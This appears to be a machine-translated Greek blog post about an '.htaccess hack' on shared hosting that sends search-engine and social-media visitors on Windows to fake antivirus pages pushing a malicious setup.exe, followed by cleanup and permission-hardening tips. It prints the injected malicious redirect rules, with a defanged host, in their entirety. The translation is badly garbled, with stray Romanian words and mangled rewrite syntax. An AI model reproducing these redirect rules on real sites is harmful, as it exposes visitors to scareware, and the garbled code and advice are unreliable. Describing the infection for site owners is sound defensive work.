Μια νέα μορφή του ιού οι οποίοι βλέπουν ότι δεν γνωρίζουν πάρα πολύ επηρεάζει sites που φιλοξενούνται σε αναξιόπιστη διακομιστές όπου οι λογαριασμοί χρηστών / λογαριασμοί υποτομέων μπορούν να "φαίνονται" μεταξύ τους. Συγκεκριμένα, όλοι οι λογαριασμοί φιλοξενίας τοποθετούνται στο φάκελο "vhosts«, Και το δικαίωμα γραφής του φάκελο χρήστη από το "vhosts" δίνεται σε έναν γενικό χρήστη ... από τον μεταπωλητή στις περισσότερες περιπτώσεις. Είναι μια τυπική μέθοδος διακομιστών Ιστού που δεν χρησιμοποιούν WHM / cPanel.
Καμπίνα
Δράση ιού Haccacc - hack .htaccess
Ιός επηρεάζει τα αρχεία .htaccess η θέση των θυμάτων. Γραμμές προστίθενται / Οδηγιών να ανακατευθύνει τους επισκέπτες (προέρχονται από yahoo, msn, google, facebook, yaindex, twitter, myspace κ.λπ. ιστότοπους και πύλες υψηλής κυκλοφορίας) σε ορισμένους ιστότοπους που προσφέρουν "antivirus«. Είναι περίπου ψεύτικο antivirus, Για την οποία έγραψα στην εισαγωγή Fake Antivirus Remover.
Εδώ είναι τι μοιάζει ένας .htaccess επηρεάζονται: (δεν έχουν πρόσβαση στις γραμμές παρακάτω διευθύνσεις URL περιεχόμενο)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine Ενεργοποιημένο
RewriteCond%} {HTTP_REFERER. * Yandex. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Odnoklassniki. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Vkontakte. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Rambler. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Tube. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Wikipedia. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Blogger. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Baidu. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Qq.com. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Myspace. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Twitter. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Facebook. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Google. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Live. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * AOL. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Bing. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Msn. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Amazon. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Ebay. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * LinkedIn. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Flickr. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * LiveJasmin. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Soso. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * DoubleClick. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Pornhub. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Orkut. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Yahoo. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Ρωτήστε. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Excite. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Altavista. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Msn. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Netscape. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Hotbot. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Goto. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Infoseek. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Mamma. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Alltheweb. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Lycos. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Αναζήτηση. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond%} {HTTP_REFERER. * Mail. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Dogpile. * $ [NC]RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]RewriteCond%} {REQUEST_FILENAME!-F
RewriteCond%} {REQUEST_FILENAME!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
Εκείνοι που χρησιμοποιούν WordPress θα βρουν αυτές τις γραμμές στο αρχείο .htaccess από public_html. Επιπλέον, ο ιός δημιουργεί ένα αρχείο. Htaccess στον ίδιο φάκελο WP-περιεχόμενο.
*Υπάρχουν επίσης περιπτώσεις στις οποίες εμφανίζεται αντί peoriavascularsurgery.com dns.thesoulfoodcafe.com ή άλλες διευθύνσεις.
Αυτό που κάνει αυτόν τον ιό.
Μόλις ανακατεύθυνση, ο επισκέπτης έχει υποδεχτεί με ανοιχτές αγκάλες από το μήνυμα:
Προσοχή!
Ο υπολογιστής σας περιέχει διάφορα σημάδια παρουσίας ιών και κακόβουλων προγραμμάτων. τα δικα σου system απαιτεί άμεσο έλεγχο κατά των ιών!
System Η ασφάλεια θα πραγματοποιήσει μια γρήγορη και δωρεάν σάρωση του υπολογιστή σας για ιούς και κακόβουλα προγράμματα.
Ανεξάρτητα από το κουμπί που πατάμε, οδηγούμε στη σελίδα "Ο Υπολογιστής μουΔημιουργήθηκε για να μιμηθεί XP σχεδιασμός. Εκεί ξεκινά αυτόματα η "διαδικασία σάρωσης", στο τέλος της οποίας ανακαλύπτουμε ότι "είμαστε μολυσμένοι".
Αφού κάνετε κλικ στο κουμπί OK ή Άκυρο, θα ξεκινήσει κατεβάσετεΑρχείο του setup.exe. Αυτό setup.exe είναι ψεύτικο καταπολέμηση του ιού επηρεάζουν το σύστημα. Εγκαταστήστε κάποιο κακόβουλο λογισμικό να διαδώσει περαιτέρω συνδέσεις σε κίνδυνο, εκτός από αυτά και ένα anti-virus λογισμικό (επίσης ψεύτικο) που καλείται να αγοράσει το θύμα.
Όσοι έχουν ήδη επικοινωνήσει με τον ιό μπορεί να χρησιμοποιήσει αυτή τη φόρμα Fake Antivirus Remover. Είναι, επίσης, συνιστάται να σαρώσει ολόκληρο το σκληρό δίσκο. Συστήνω Το Kaspersky Internet Security ή Kaspersky Anti Virus.
Αυτός ο τύπος του ιού επηρεάζει Επισκέπτης λειτουργικά συστήματα OS Windows XP, Windows ME Windows 2000, Windows NT, Windows 98 si Windows 95. Μέχρι στιγμής δεν υπάρχουν γνωστές περιπτώσεις μόλυνσης των λειτουργικών συστημάτων Windows Το βλέμμα ναι Windows 7.
Πώς μπορούμε να εξαλείψει τον ιό. Htaccess αρχείο στον server και πώς να την πρόληψη της λοίμωξης.
1. Αναλύστε ύποπτα αρχεία και διαγραφή κωδικών. Για να εξασφαλιστεί ότι το αρχείο δεν επηρεάζεται μόνο .htaccess θα πρέπει αναλύσει όλα τα αρχεία . Php si . Js.
2. Ξαναγράψτε το αρχείο. Htaccess και να ρυθμίσετε το chmod 644 ή 744 με πρόσβαση εγγραφής μόνο χρήστη του ιδιοκτήτη.
3. Όταν δημιουργείτε ένα λογαριασμό φιλοξενίας για την ιστοσελίδα στο φάκελο / Αρχική σελίδα ή / Webroot Αυτό θα δημιουργήσει αυτόματα ένα φάκελο που έχει συχνά το όνομα του χρήστη (χρήστη για cpanel, ftpΚ.λπ.). Για να αποφύγετε την εγγραφή δεδομένων και τη μετάδοση των ιών από τον ένα χρήστη στον άλλο, συνιστάται ότι κάθε φάκελο χρήστη να καθοριστούν:
chmod 644 ή 744, 755 – 644 υποδεικνύεται.
chown -R όνομα χρήστη folder_name.
chgrp-R nume_user nume_folder
ls-όλα τρόποι για να ελέγξετε αν έγιναν σωστά. Αν εμφανιστεί κάτι σαν αυτό:
drwx - x - x 12 dinamics dinamics 4096 6 Μαΐου 14:51 dinamics /
drwx - x - x 10 duran duran 4096 Μαρ 7 07:46 duran /
drwx - x - x 12 δοκιμαστικός σωλήνας δοκιμαστικός σωλήνας 4096 29 Ιαν 11:23 δοκιμαστικός σωλήνας /
drwxr-xr-x 14 express express 4096 26 Φεβρουαρίου 2009 express /
drwxr-xr-x 9 ezo ezo 4096 Μάιος 19 01:09 ezo /
drwx - x - x 9 farma farma 4096 Δεκ 19 22:29 farma /
Εάν ένα από τα παραπάνω θα userele FTP Μολυσμένα αρχείαΔεν μπορείτε να στείλετε τον ιό σε άλλο χρήστη υποδοχής. Είναι ένα ελάχιστο μέτρο ασφαλείας για την προστασία των λογαριασμών φιλοξενείται σε έναν web server.
Κοινά στοιχεία των περιοχών που έχουν πληγεί από τον ιό.
Όλοι οι επηρεαζόμενοι τομείς ανακατευθύνουν τους επισκέπτες σε ιστότοπους που περιέχουν "/main.php? s = 4 & Η".
Αυτό "ιό. htaccessΕπηρεάζει κάθε τύπο CMS (Joomla, WordPress, phpBBΚ.λπ.) με τη χρήση .htaccess.
.htaccess Hack & Redirect ιών.
